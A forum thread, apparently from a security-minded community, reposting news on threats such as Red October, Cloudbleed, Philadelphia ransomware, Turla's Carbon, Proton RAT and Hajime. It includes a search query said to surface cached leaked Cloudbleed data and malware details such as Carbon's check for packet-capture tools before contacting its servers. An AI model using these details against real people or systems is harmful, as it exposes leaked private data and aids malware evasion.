Researchers at Kaspersky Lab have uncovered an "advanced cyber espionage network" - dubbed Red October - that has been active for at least five years and is targeting diplomatic and government agencies.

At the request of an unnamed partner, Kaspersky investigated and uncovered Red October (or Rocra) in October. Since at least 2007, it has targeted organizations mostly in Eastern Europe, former USSR members, and countries in Central Asia, but the malware has also showed up in Western Europe and North America.

http://www.pcmag.com/article2/0,2817,2414260,00.asp


The team at Kaspersy noted that though they’d found a set of 60 “command and control” servers throughout Germany and Russia that were responsible for these attacks, they each appeared to have been controlled by a sort of “mother ship” server which they’ve not yet located. Each of the attacks thus far appear to have been attached to Microsoft Word or Excel documents and delivered via email. When the document was downloaded and opened, a connection was made between the computer and one of the many command and control servers which then delivered the files necessary to collect secure data.

This Rocra malware was also spread with USB drives as well as through smartphones, not just through desktop machines. Mentions of Russian words throughout the discovered malware systems have been suggested to either point towards the software as being Russian in origin or placed deliberately to make the software appear to have come from Russia when in fact it was made by a different group entirely.

http://www.slashgear.com/operation-red-october-cyberattack-detailed-by-kaspersky-lab-14265239/

Sounds ominous. Anyone know anything more that they can share?


Punta Cana, Dominican Republic – February 10, 2014 - Kaspersky Lab’s security research team today announced the discovery of “The Mask” (aka Careto), an advanced Spanish-language speaking threat actor that has been involved in global cyber-espionage operations since at least 2007. What makes The Mask special is the complexity of the toolset used by the attackers, including an extremely sophisticated malware, a rootkit, a bootkit, Mac OS X and Linux versions and possibly versions for Android and iOS (iPad/iPhone).

The primary targets are government institutions, diplomatic offices and embassies, energy, oil and gas companies, research organizations and activists. Victims of this targeted attack have been found in 31 countries around the world – from the Middle East and Europe to Africa and the Americas.
http://usa.kaspersky.com/about-us/press-center/press-releases/kaspersky-lab-uncovers-%E2%80%9C-mask%E2%80%9D-one-most-advanced-global-cyber-e

Based on the prevalence of Spanish-speaking victims, the number of infected victims in Morocco, and the fact that Gibraltar is on the list, that implies Spain is behind this one. My guess is that soon countries will start infecting uninteresting targets in order to deflect blame, but that they still think they’re immune from discovery. So Spain, if it is you, attack a few sites in the Falklands next time -- and use a separate tool for Morocco.
https://www.schneier.com/blog/archives/2014/02/the_mask_espion.html

Separate thread, considering the number of readers using I-Phones.


Apple quietly released a major update Friday to fix a security glitch in its iOS 7 systems. But independent security experts say the seemingly routine update covers up what arguably could be Apple’s biggest security lapse, exposing iPhone, iPad and iPod Touch users to hackers.

The issue is an extra line of “goto” code that bypasses the iOS system’s authentication process, allowing a third party to intercept emails and Internet traffic. That means a hacker can pose as a friendly, trusted source, such as your email provider, and eavesdrop on users’ encrypted Internet traffic and potentially take full control of the system.

http://thinkprogress.org/home/2014/02/23/3321131/iphone-security-flaw/#

Security experts have discovered a malware platform that's so advanced in its design and execution that it could probably have been developed only with the active support of a nation-state.

The malware—known alternatively as "ProjectSauron" by researchers from Kaspersky Lab and "Remsec" by their counterparts from Symantec—has been active since at least 2011 and has been discovered on 30 or so targets. Its ability to operate undetected for five years is a testament to its creators, who clearly studied other state-sponsored hacking groups in an attempt to replicate their advances and avoid their mistakes. State-sponsored groups have been responsible for malware like the Stuxnet- or National Security Agency-linked Flame, Duqu, and Regin. Much of ProjectSauron resides solely in computer memory and was written in the form of Binary Large Objects, making it hard to detect using antivirus.

http://arstechnica.com/security/2016/08/researchers-crack-open-unusually-advanced-malware-that-hid-for-5-years/

Government Hackers Caught Using Unprecedented iPhone Spy Tool


It appears that the company that provided the spyware and the zero-day exploits to the hackers targeting Mansoor is a little-known Israeli surveillance vendor called NSO Group, which Lookout’s vice president of research Mike Murray labeled as “basically a cyber arms dealer.”
http://motherboard.vice.com/read/government-hackers-iphone-hacking-jailbreak-nso-group

Hackers claim to have stolen attack code from a team of sophisticated cyber spies known as “the Equation Group,” widely believed to be associated with the U.S. National Security Agency, one of the world’s top intelligence outfits. The hackers have offered to sell their purloined exploits to the highest bidder in an online auction conducted in the cryptocurrency Bitcoin.

Although the alleged breach could just be an extravagant hoax, experts who reviewed a preliminary data dump teased alongside the hackers’ garbled sales pitch said that the files, amazingly, looked authentic. “This appears to be legitimate code,” Matt Suiche, a French cybersecurity entrepreneur, wrote in a Medium blog post, echoing what others had posted on Twitter ( TWTR -0.11% ) .

http://fortune.com/2016/08/16/nsa-hack-auction-shadow-brokers-cyber-weapons/

Warning for SWJ commenters and bloggers and or blogsites....

List of Sites possibly affected by Cloudflare's #Cloudbleed HTTPS Traffic Leak

https://github.com/pirate/sites-using-cloudflare/blob/master/README.md


DISCLAIMER:
This list contains all domains that use cloudflare DNS, not just the cloudflare SSL proxy (the affected service that leaked data). It's a broad sweeping list that includes everything. Just because a domain is on the list does not mean the site is compromised. This list will be narrowed down to the affected domains as I get more information. This is a (work-in-progress) list of domains possibly affected by the CloudBleed HTTPS traffic leak. Original vuln thread by Google Project Zero.
Cloudflare has not provided an official list of affected domains, and likely will not due to privacy concerns. I'm compiling an unofficial list here so you know what passwords to change.
Impact
Between 2016-09-22 - 2017-02-18 passwords, private messages, API keys, and other sensitive data were leaked by Cloudflare to random requesters. Data was cached by search engines, and may have been collected by random adversaries over the past few months.
"The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests), potential of 100k-200k paged with private data leaked every day" -- source
You can see some of the leaked data yourself in search engine caches: https://duckduckgo.com/?q=+%7B%22scheme%22%3A%22http%22%7D+CF-Host-Origin-IP&t=h_&ia=web
What should I do?
Check your password managers and change all your passwords, especially those on these affected sites. Rotate API keys & secrets, and confirm you have 2-FA set up for important accounts. Theoretically sites not in this list can also be affected (because an affected site could have made an API request to a non-affected one), so to be safe you should probably change all your important passwords.
Submit PR's to add domains that you know are using cloudflare
Methodology
This list was compiled from 3 large dumps of all cloudflare customers provided by crimeflare.com/cfs.html, and several manually copy-pasted lists from stackshare.io and wappalyzer.com. Crimeshare collected their lists by doing NS DNS lookups on a large number of domains, and checking SSL certificate ownership.
I scraped the Alexa top 10,000 by using a simple loop over the list:
for domain in (cat ~/Desktop/alexa_10000.csv)
if dig $domain NS | grep cloudflare
echo $domain >> affected.txt
end
end
The alexa scrape, and the crimeflare dumps were then combined in a single text file, and passed through uniq | sort. I've since accepted several PRs and issues to remove sites that were unaffected from the list.
Data sources:
https://stackshare.io/cloudflare
https://wappalyzer.com/applications/cloudflare
DNS scraper I'm running on Alexa top 10,000 sites (grepping for cloudflare in results)
https://www.cloudflare.com/ips/ (going to find sites that resolve to these IPs next)
http://www.crimeflare.com/cfs.html (scrape of all cloudflare customers)
http://www.doesitusecloudflare.com/
I'd rather be safe than sorry so I've included any domain here that remotely touches cloudflare. If I've made a mistake and you believe your site is not affected, submit a PR and I will merge it ASAP, I don't want to hurt anyone's reputation unecessarily.
You can also ping me on twitter @theSquashSH and I'll respond as soon as I can.
Full List
Download the full list.zip (22mb)
4,287,625 possibly affected domains. Download this file, unzip it, then run grep -x domaintocheck.com sorted_unique_cf.txt to see if a domain is present.
Also, a list of some iOS apps that may have been affected.

For those late to it, yes, you probably should change your passwords on sites that use CloudFlare as a precaution
https://bugs.chromium.org/p/project-zero/issues/detail?id=1139#

To be clear, this isn't some nation state level attack: data is cached in search engines right now

A new thread for temporary maximum visibility and explained in the main post that will appear first in a moment. Thanks to Outlaw09 spotting the circulation.

CloudBleed: check if you visited sites affected by CloudFlare’s security issue

By Martin Brinkmann on February 26, 2017 in Security - Last

Update:February 26, 2017

CloudBleed is the unofficial name for a security issue discovered on February 17th, 2017 that affected CloudFlare's reverse proxies.
CloudFlare is a large provider that is used by more than 5.5 million Internet properties according to the company's website. It offers CDN and DDOS protection, optimization technologies for websites, dedicated SSL and a lot more.
The basic service is offered for free, but webmasters and organizations may upgrade to a paid plan for additional features and better protection.
The security issue at hand caused the servers to "run past the end of a buffer" which returned memory that contained private information. Among other things, it might have included HTTP cookies, authentication tokens, HTTP Post bodies, and other sensitive data.
The issue was disclosed by Google's Project Zero, and has since been fixed by CloudFlare.
Cloudbleed

The main issue for Internet users is that their authentication cookies or data may have leaked. Search engines may have cached the data, and attackers may have exploited the issue as well to gather the data.
Since there is no record whether individual user data was leaked or not, some experts suggests that users change passwords on all sites and services that use CloudFlare. This is a difficult thing for most users however, as it is quite time consuming to find out whether services and sites use CloudFlare.
The Firefox add-on and Chrome Extension CloudBleed changes that. Designed by the NoSquint Plus author, it is parsing the browsing history of the browser to reveal any site or service that uses CloudFlare.
This enables you to go quickly through the listing to identify sites that you have an account on.
The extensions work identical in both browsers. Simply install it in your browser of choice, and click on the icon that it adds to the main toolbar of the browser.
The page that loads includes a short explanation, and a search button that you need to click on. The extension goes through the browsing history then, and checks whether sites in the history were affected by the issue.
Some sites may appear multiple times in the listing. An option to filter sites by domain, or subdomain, would have been useful.
The author notes that all processing is done on the local system. All that is left afterwards is to go through the list to identify the sites with accounts.
Closing Words
CloudBleed is a handy browser extension for Google Chrome and Firefox. You may use it to reveal sites affected by CloudFlare's recent security issue quickly, provided that you did not delete the browsing history in the meantime.
Now You: Have you changed account passwords of affected sites?

Moderator's Note

A number of posts have appeared recently in another thread, which advertise malware and other nasty IT things and they deserve their own thread. So I will move eight readily id'd posts that are not Russian focused here, all of them by Outlaw09 who works in the cyber arena. It may help to watch the Russian Cyber & Disinformation thread for background and other matters: Russian Info, Cyber and Disinformation (Catch all 2017 onwards). (http://council.smallwarsjournal.com/Russian Info, Cyber and Disinformation (Catch all 2017 onwards).)
(Mod Ends)

ALERT....I had posted this previously but am doing it again as it spreading fast now world wide

Philadelphia Ransomware, a new threat targets the Healthcare Industry

Security experts from Forcepoint have discovered a new strain of ransomware dubbed Philadelphia that is targeting organizations in the healthcare industry.

The Philadelphia ransomware is a variant of the Stampado ransomware, a very cheap malware offered for sale on the Dark Web since June 2016 at just 39 USD for a lifetime license.

Last month the popular expert Brian Krebs discovered on YouTube an ad Philadelphia.


According to the researchers, thePhiladelphia ransomware is distributed via spear-phishing emails sent to the hospitals. The messages contain a shortened URL that points to a personal storage site that serves a weaponized DOCX file containing the targeted healthcare organization’s logo.

The file includes three document icons apparently related to patient information, and attempt to trick victims to click on them.

Philadelphia ransomware

If the victims click on the icon, a Javascript is triggered which downloads and executes a variant of the Philadelphia ransomware.

This tactic was already used to infect a hospital from Oregon and Southwest Washington.

“However, it appears that amateur cybercriminals have also started to shift towards this trend in the form of an off-the-shelf ransomware aimed at a healthcare organization in the United States.” reads the analysis published by ForcePoint.

“In this attack, a shortened URL, which we believe was sent through a spear-phishing email, was used as a lure to infect a hospital from Oregon and Southwest Washington. Once a user clicks on the link, the site redirects to a personal storage site to download a malicious DOCX file. This document contains the targeted healthcare organization’s logo and a signature of a medical practitioner from that organization as bait.”

Once the ransomware infected the system it contacts the C&C server and sends various details on the target machine, including operating system, username, country, and system language. The C&C server responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.

The Philadelphia ransomware used AES-256 to encrypt the files, when the operation is completed it displays a request for 0.3 Bitcoins ransom to the victims.

The analysis of the malicious code revealed a couple of interesting things:
•the encrypted JavaScript contained a string “hospitalspam” in its directory path.
•the ransomware C&C also contained “hospital/spam” in its path.

The presence of the words suggests the attackers are specifically targeting hospitals using spear phishing emails.

“Ransomware-as-a-service (RaaS) platforms such as Philadelphia continue to attract would-be cybercriminals to take part in the ransomware business” concluded Forcepoint. “Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector,”

The Russian group Turla has continued to improve its Carbon backdoor, experts from ESET detected new versions released on a regular basis.

The Russian APT group known as Turla (also known as Waterbug, KRYPTON and Venomous Bear) has continued to improve its Carbon backdoor, experts from ESET detected new versions released on a regular basis.

Carbon is a second-stage backdoor that is used after an initial reconnaissance phase of an attack, it involves malware such as Tavdig.

The Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents.

Last time the researchers reported Turla‘s activities was February 2017, when experts at Kaspersky Lab have discovered a new piece of JavaScript malware linked to the group targeting organizations in Greece, Qatar, and Romania.

Turla has been active since at least 2007, the hackers launched several high-profile attacks against targets worldwide, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command.

Carbon, aka Pfinet, is once of the tool in the arsenal of the hacking crew, researchers from ESET described it as a lite version of Uroburos.

Carbon is a second-stage backdoor that is typically deployed after the reconnaissance phase of an attack, it has several components, including a dropper, a command and control (C&C) communications element, an orchestrator, and a loader that executes the orchestrator.

The orchestrator is used to inject the C&C communications library into a legitimate process, and dispatch the tasks received via the C&C library to other bots that are located on the network.

Turla

ESET has identified several versions of Carbon compiled last year; the most recent one was compilated on October 21, 2016. The newer versions of the Carbon malware make a massive use of encryption.

Almost any component is a DLL file, except for the loader, which is an EXE file.

“The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.” reads the analysis shared by ESET.

“After a successful attack, a first stage backdoor — such as Tavdig or Skipper — is installed on the user machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.”

Threat actor behind Turla have modified their tools everytime they were detected in the wild. Researchers observed that in the case of Carbon, the hackers changed file names and mutexes in the version 3.8 released in the summer of 2016.

Experts noticed that before the malware start communicating with C&C, it checks the infected system for the presence of packet capture software, such as Wireshark and Tcpdump.


“Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:

•TCPdump.exe
•windump.exe
•ethereal.exe
•wireshark.exe
•ettercap.exe
•snoop.exe
•dsniff.exe”

Over 20 million Gmail and 5 million Yahoo accounts available for sale on the Dark Web



The vendor "SunTzu583" is offering for sale over 20 million Gmail and 5 million Yahoo login credentials on the Dark Web A vendor with the online moniker "SunTzu583" is reportedly selling millions of login credentials for Gmail and Yahoo accounts on a

A vendor with the online moniker “SunTzu583” is reportedly selling millions of login credentials for Gmail and Yahoo accounts on a black market in the dark web. Over 20 million Gmail accounts and 5 million Yahoo accounts are available for sale, the huge trove of data is the result of previous massive data breaches.

SunTzu583 is known to security experts, he was specialized in the sale of stolen login credentials.

A couple of weeks ago the colleagues at HackRead reported the sale of more than 1 million Gmail and Yahoo accounts by the same seller and a few days later, SunTzu583 started selling PlayStation accounts.

Dark web Playstation accounts

SunTzu583 offered 640,000 PlayStation accounts for USD 35.71 (0.0292 BTC), the dump includes emails and clear-text passwords.

SunTzu583 confirmed that the archive was not directly stolen from PlayStation network, but it does contain unique accounts of PlayStation users. The seller added that even if the accounts may work for other web services they are first of all PlayStation accounts.

Back to the present, the seller SunTzu583 is offering in separate listings millions of Gmail accounts.

In three different listings, he is offering 4,928,888 accounts.

“The total number of Gmail accounts being sold are 4,928,888 which have been divided into three different listings. All three listings contain 2,262,444 accounts including emails and their clear text passwords.” reports the analysis published by HackRead. “In the description of these listings, SunTzu583 has mentioned that “Not all these combinations work directly on Gmail, so don’t expect that all these email and passwords combinations work on Gmail.””

The researchers at HackRead who have compared the listings with Hacked-DB and Have I been pwned repositories confirmed that the sources of the data are past data breaches including LinkedIn (117 million accounts), Adobe (153 million accounts) and Bitcoin Security Forum (5 million Gmail passwords).

Experts from security firm Sixgill have discovered a new strain of the macOS Proton RAT that is offered for sale on Russian cybercrime underground.

The Dark Web is the right place where to find any kind of illegal products and services, malware such as banking trojan and spyware are very popular in cyber criminal underground.

Recently a new remote access tool (RAT) specifically designed to infect macOS systems is currently being advertised on Russian cybercrime underground. The researchers at security firm Sixgill discovered the advertising on crime forums and on a custom website, this threat is also described in videos published on YouTube.

https://youtu.be/JA7sfDc9Ad0

The Proton homepage went down just after the experts at Sixgill published the report.

“Sixgill researchers have encountered a post in one of the leading, closed Russian cybercrime message boards. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. The author offered this product in one of the leading underground cybercrime markets.” reads a report published by Sixgill.

The Proton RAT first appeared in the threat landscape last year, the variant recently advertised on hacking forums includes many features such as the ability to execute console commands, access the user’s webcam, log keystrokes, capture screenshots and open SSH/VNC remote connections. The malicious code is also able to inject malicious code in the user’s browser to display popups asking victims information such as credit card numbers, login credentials, and others.

“The malware includes root-access privileges and features allowing an attacker to obtain full control of the victim’s computer. Its capabilities include: running real-time console commands and file-manager, keylogging, SSH/VNC connectivity, screenshots, webcam operation and the ability to present a custom native window requesting information such as a credit-card, driver’s license and more. The malware also boasts the capability of iCloud access, even when two-factor authentication is enabled.” continues the report.

According to the author, macOS Proton RAT is written in native Objective-C and it is fully undetected by any existing MAC OS antivirus solution.

Below the list of features described in the ad:

macOS Proton RAT

The Proton RAT has root access and is able to elude standard macOS security features, it is also able to bypass two-factor authentication on iCloud accounts.

Researchers speculate macOS Proton RAT leverages a zero-day vulnerability in macOS, but most interesting characteristic of the threat is that the malicious code is signed with genuine Apple code-signing certificates. It is likely the author has managed to falsify registration to Apple Developer ID Program or has stolend the credentials to an apple developer.

“The real threat behind the software is this: The malware is shipped with genuine Apple code-signing signatures. This means the author of Proton RAT somehow got through the rigorous filtration process Apple places on MAC OS developers of third-party software, and obtained genuine certifications for his program. Sixgill evaluates that the malware developer has managed to falsify registration to the Apple Developer ID Program or used stolen developer credentials for the purpose.” reads the report.

The price for the macOS Proton RAT ranged from $1,200 to $830,000 for the entire project (an absurd price). Below the version advertised on the Proton websites:

Standard Edition

I) License to control only ONE remote machine 1) 1 BTC — unsigned 2) 2 BTC — signed
II) License to control 20 remote machines 1) 10 BTC — unsigned 2) 11 BTC — signed
III) License to control infinite remote machines 1) 66 BTC — unsigned 2) 76 BTC — signed

Extended edition

I) License to control infinite remote machines 1) 166 BTC — unsigned 2) 200 BTC — signed
II) License to control infinite remote machines on your own server 1) 366 BTC — without source code 2) 666 BTC — with full source code

Researchers noticed that the authors of the malware try to disguise their spyware as legitimate surveillance software.

The Sundown EK has been inactive since early this year, the Terror EK is being very popular in the cybercriminal ecosystem.


One year ago the Angler EK and Nuclear EK disappeared from the threat landscape, while the Sundown EK was conquering the criminal underground.

What’s happening now?

The Sundown EK has been inactive since early this year, the Terror EK is being very popular in the cybercriminal ecosystem.

Last week, Cisco Talos published an analysis of Sundown EK, the expert detailed the improvements of the EK that presented many similarities with the RIG exploit kit.

“Sundown is an exploit kit in transition, it has stopped using calling cards and other easily ways to identify its activity. It is one of the few exploit kits adding any new exploits to their arsenal, albeit stolen. At the same time they consistently steal exploits and technologies from other people and competitors.” reads the analysis of the Talos group. “The exploit kit landscape has been struggling to find its footing since the major players have left. It still appears to be in transition with RIG and Sundown being the primary players left as an option for those looking to compromise random victims while browsing the web.”

The Sundown EK was not sophisticated like other large exploit kits.

Security experts at Talos were noticing a long inactivity of the Sundown EK, also variant of the kit was disappeared from the scene, including Bizarro and Greenflash.

This silence leads the experts into believing that threat actor ceased the operations.

“Many security researchers tracking exploit kits have noted the lack of Sundown EK activity for several weeks now. A post from Cisco’s Talos team came off as a bit of a surprise at the end of March (Threat Spotlight: Sundown Matures), but any doubts were squashed by this tweet on April 8th (Sundown (Beps) and Nebula out ? More than one month since last hits).” reads a blog post published by MalwareBytes.

“Also, whatever happened to Bizarro and Greenflash Sundown EKs? Whether this is a temporary break or yet another dead EK, time will tell.”

Recently experts observed a significant increase of hacking campaigns leveraging the Terror EK.

Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a newer campaign using a different landing page that distributes the Andromeda malware.

The compromised websites are leveraged to redirect to the exploit kit landing page via server 302 redirect call and done via script injection.

Terror EK

“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.

Lawyers, malware, and money: The antivirus market’s nasty fight over Cylance

On the front lines of the antivirus industry's "testing wars."
Sean Gallagher - 4/17/2017, 1:00 PM

https://arstechnica.com/information-technology/2017/04/the-mystery-of-the-malware-that-wasnt/

Last posting that I find critical as I and my company have moved into this research area over the last year and it is massive...especially on the botnet side of the Deep Net.....AND how those botnets are being tied into the Russian hacking and information war with the West....if these botnets are not pushing info war messaging...then they are into spamming...phishing and DDoS attacks.....and then back to info warfare messaging....depending on need and end user tasking's....

Security firm Flashpoint published an interesting paper titled, "Cybercrime Economy: An Analysis of Cybercriminal Communication Strategies" about cybercriminal communications of threat actors.


A recent research by the threat intelligence firm Flashpoint has uncovered how malicious threat actors communicate to share information between them.
The research has found out that there is a growing economy in the cybercriminals communications, more than just information sharing it has formed an ecosystem in which the failures, successes, planning and procedures to beat the organization’s countermeasures are shared as well as the planning of attacks.
The research points out that Cybercriminal Communications use a variety of software alongside with the access to communities in the deep and dark web. This is done in order to carry out cross domain organization for commit crimes like phishing, credit card fraud, spam, and every sort of attack that pass through the corporations’ filters and defenses.

The reason for the use of this software to communicate is too make it to difficult law enforcement agencies to track the activities in the community’s forums as well as to give privacy to the user since most of these programs have cryptographic functions or protocols operating in its core. The software also allows a user to enter random, aleatory or even fraudulent information about the user which makes it more difficult, in determining who the user is.
On the other hand, one other reason for doing so is the payment required to maintain a forum, which in many cases can represent a difficultly for cybercriminals. The use of communications programs is free of charge and anyone can download them.
The study was carried out by monitoring underground communities where the users often invited other members to discuss the planning outside the underground forum. It was analyzed 80 instant messengers applications and protocols, of which at least five were more used.
Privacy is implemented in these applications, like PGP an algorithm of encryption. The secure communication of user’s difficulty authorities to gain access to the content shared between the users. Without knowing the encryption key that has generated the codification for the session.
The most used programs by cybercriminals are ICQ, Skype, Jaber, Quiet Internet Pager, Pretty Good Privacy, Pidgin, PSI and AOL Instant Messenger (AIM).
The report shows that the use of Cybercriminal Communications#is different among communities of different languages, below are reported “Language Group Specific Findings” for Russians we have the following situation:
1. Jabber (28.3%) 2. Skype (24.26) 3. ICQ (18.74%) 4. Telegram (16.39%) 5. WhatsApp (3.93%) 6. PGP (3.79%) 7. Viber (3.01%) 8. Signal (1.58%)
while for the Chinese we have the following distribution in 2016: 1. QQ (63.33%) 2. WeChat (35.58%) 3. Skype (0.44%) 4. WhatsApp (0.22%) 5. Jabber (0.31%) 6. PGP (0.13%) 7. ICQ (0.1%) 8. AOL Instant Messenger (0.08%)
“Cybercriminals can choose from a wide variety of platforms to conduct their peer-to-peer (P2P) communications.” states the report. “This choice is typically influenced by a combination of factors, which can include:
Ease of use
Country and/or Language
Security and/or anonymity concerns
Sources:
http://www.securityweek.com/many-cybercriminals-prefer-skype-communications-study
http://www.ibtimes.co.uk/skype-whatsapp-how-cybercriminals-share-hacking-tips-tricks-online-1617822
http://www.itnews.com/article/3190830/security/report-cybercriminals-prefer-skype-jabber-and-icq.html
http://www.infoworld.com/article/3190563/encryption/cybercriminals-prefer-to-chat-over-skype.html
https://www.flashpoint-intel.com/blog/cybercrime/cybercriminal-communication-strategies/

BTW...Jabber was the preferred chat of choice for the US Army intel side for years....

IoT malware clashes in a botnet territory battle
http://www.cio.com/article/3190179/security/iot-malware-clashes-in-a-botnet-territory-battle.html#
… via @CIOonline

Hajime IoT malware, is it the work of vigilante hacker?



Mirai -- a notorious malware that's been enslaving IoT devices -- has competition.
A rival piece of programming has been infecting some of the same easy-to-hack internet-of-things products, with a resiliency that surpasses Mirai, according to security researchers.
"You can almost call it Mirai on steroids," said Marshal Webb, CTO at BackConnect, a provider of services to protect against distributed denial-of-service (DDoS)#attacks.
[ Your guide to top tech conferences 2017 ]
Security researchers have dubbed the rival IoT malware Hajime, and since it was discovered more than six months ago, it's been spreading unabated and creating a botnet. Webb estimates it's infected about 100,000 devices across the globe. ###

These botnets, or networks of enslaved computers, can be problematic. They're often used to launch massive DDoS attacks that can take down websites or even disrupt the internet’s infrastructure.
That’s how the Mirai malware grabbed headlines last October. A DDoS attack from a Mirai-created botnet targeted DNS provider Dyn, which shut down and slowed internet traffic across the U.S.
Hajime was first discovered in the same month, when security researchers at Rapidity Networks were on the lookout for Mirai activity. What they found instead was something similar, but also more tenacious.
Like Mirai, Hajime also scans the internet for poorly secured IoT devices like cameras, DVRs, and routers. It compromises them by trying different username and password combinations#and then transferring a malicious program.

However, Hajime doesn’t take orders from a command-and-control server like Mirai-infected devices do. Instead, it communicates over a peer-to-peer network built off protocols used in BitTorrent, resulting in a botnet that's more decentralized -- and harder to stop.
"Hajime is much, much more advanced than Mirai," Webb said. "It has a more effective way to do command and control."
Broadband providers have been chipping away at Mirai-created botnets, by blocking internet traffic to the command servers they communicate with. In the meantime, Hajime has continued to grow 24/7, enslaving some of the same devices. Its peer-to-peer nature means many of the infected devices can relay files or instructions to rest of the botnet, making it more resilient against any blocking efforts.

Who's behind Hajime? Security researchers aren’t sure. Strangely, they haven't observed the Hajime botnet launching any DDoS attacks -- which is good news. #A botnet of Hajime’s scope is probably capable of launching a massive one similar to what Mirai has done.
"There’s been no attribution. Nobody has claimed it," said Pascal Geenens, a security researcher at security vendor Radware. #
However, Hajime does continue to search the internet for vulnerable devices. Geenens' own honeypot, a system that tracks botnet activity, has been inundated with infection attempts from Hajime-controlled devices, he said.
So the ultimate purpose of this botnet remains unknown.#But one scenario is it'll be used for cybercrime to launch DDoS attacks for extortion purposes or to engage in financial fraud. #
"It's a big threat forming," Geenens said. "At some point, it can be used for something dangerous."
It’s also possible Hajime might be a research project. Or in a possible twist, maybe it's a vigilante security expert out to disrupt Mirai.
So far, Hajime appears to be more widespread than Mirai, said Vesselin Bontchev, a security expert at Bulgaria's National Laboratory of Computer Virology.
However, there's another key difference between the two malware. Hajime has been found infecting a smaller pool of IoT devices using ARM chip architecture.
That contrasts from Mirai, which saw its source code publicly released in late September. Since then, copycat hackers have taken the code and upgraded the malware.#Vesselin has found Mirai strains infecting IoT products that use ARM, MIPS, x86, and six other platforms.
That means the clash between the two malware doesn’t completely overlap. Nevertheless, Hajime has stifled some of Mirai’s expansion.
"There's definitely an ongoing territorial conflict," said Allison Nixon, director of security research at Flashpoint.
To stop the malware, security researchers say it's best to tackle the problem at its root, by patching the vulnerable IoT devices. But that will take time and, in other cases, it might not even be possible. Some IoT vendors have released security patches for their products to prevent malware infections, but many others have not, Nixon said.
That means Hajime and Mirai will probably stick around for a long time, unless those devices are retired.
"It will keep going," Nixon said. "Even if there's a power outage, [the malware] will just be back and re-infect the devices. It's never going to stop."

A number of posts have appeared recently in another thread, which advertise malware and other nasty IT things and they deserve their own thread. So I will move a dozen or so posts here, all of them by Outlaw09 who works in the cyber arena. Accordingly this post will drop from being first.:wry:

IMPORTANT for providers of critical infrastructure....


Severe vulnerability in GE Multilin SR poses a serious threat to Power Grid
Security experts discovered a critical vulnerability in GE Multilin SR that poses a serious threat to the power grid worldwide. A team of researchers from New York University has found a serious vulnerability in some of GE Multilin SR protection relays...
The experts will provide further details about the vulnerability at the upcoming Black Hat conference in Las Vegas,#below an excerpt from the#abstract#published on the conference website.
“Essentially, we completely broke the homebrew encryption algorithm used by these protection and management devices to authenticate users and allow privileged operations,” explained the experts in their abstract. “Knowledge of the passcode enables an attacker to completely pwn the device and disconnect sectors of the power grid at will, locking operators out to prolong the attack.”
The experts will propose also a live demo showcasing exploitation of the vulnerability during their talk anticipating that an attack leveraging on the issue would have a significant impact on a nation.
The#ICS-CERT published a security advisory#on this threat that was tracked as CVE-2017-7095.
An attacker can obtain the password either from the front LCD panel or via Modbus commands and use it to gain unauthorized access to vulnerable products.
“Successful exploitation of this vulnerability may allow a remote attacker to obtain weakly encrypted user passwords, which could be used to gain unauthorized access to affected products.” reads the advisory.#
“Cipher text versions of user passwords were created with a non-random initialization vector leaving them susceptible to dictionary attacks. Cipher text of user passwords can be obtained from the front LCD panel of affected products and through issued Modbus commands.”

The following versions of GE Multilin SR relays are affected by the flaw:
750 Feeder Protection Relay, firmware versions prior to Version 7.47,
760 Feeder Protection Relay, firmware versions prior to Version 7.47,
469 Motor Protection Relay, firmware versions prior to Version 5.23,
489 Generator Protection Relay, firmware versions prior to Version 4.06,
745 Transformer Protection Relay, firmware versions prior to Version 5.23, and
369 Motor Protection Relay, all firmware versions.
GE has promptly released firmware updates that fix the vulnerability for most of the above products. The firmware updates for 369 Motor Protection Relays are expected to be released in June.
To mitigate the vulnerability#GE recommends that users apply updated firmware versions to affected products, as well as implement the following best practices:
Control access to affected products by keeping devices in a locked and secure environment,
Remove passwords when decommissioning devices,
Monitor and block malicious network activity, and
Implement appropriate network segmentation and place affected devices within the control system network, behind properly configured firewalls. Protection and Control system devices should not be directly connected to the Internet or business networks.
While the recent disruptions to Ukraine’s energy supply have clearly demonstrated that attacks on the power grid are a reality, it’s not uncommon for cybersecurity researchers to exaggerate the impact of their findings. It remains to be seen exactly how easily this flaw can be exploited after more information is made available.

According to the experts from security firm FireEye, the financially-motivated FIN7 group is changing hacking techniques.


The group that has been active since late 2015, and was recently spotted to have been targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.

The FIN7 group has adopted new phishing techniques, it is leveraging on hidden shortcut files (LNK files) to compromise targets.

Experts from FireEye highlighted that attacks were launched by FIN7 group and not the Carbanak Group as suspected by other security experts.

